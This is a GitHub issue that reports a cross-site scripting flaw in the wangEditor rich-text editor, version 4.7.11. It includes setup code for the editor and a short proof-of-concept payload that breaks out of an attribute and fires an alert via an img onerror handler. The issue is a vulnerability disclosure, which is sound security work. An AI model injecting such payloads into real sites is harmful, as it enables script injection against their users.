Skip to content

There is an XSS vulnerability at the link  #3870

Closed
@wahaha1573

Description

@wahaha1573

bug

XSS vulnerability

wangEditor version

V4.7.11

Can the official website reproduce the loopholes ?

yes

Reproduction steps

1.Use the following code to build the environment or on the official demo website(https://codepen.io/xiaokyo-the-bold/pen/ZEpWByR)

<script type="text/javascript" src="https://unpkg.com/wangeditor/dist/wangEditor.min.js"></script>
<span class="col-lg-8" id="editor"></span>
<script type="text/javascript">
  const E = window.wangEditor
  const editor = new E('#editor')
  editor.create()
</script>

2.Visit this HTML page and do the following
poyload:
"><img src=1 onerror=alert(/xss/)>
image
image

Metadata

Metadata

Assignees

Labels

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions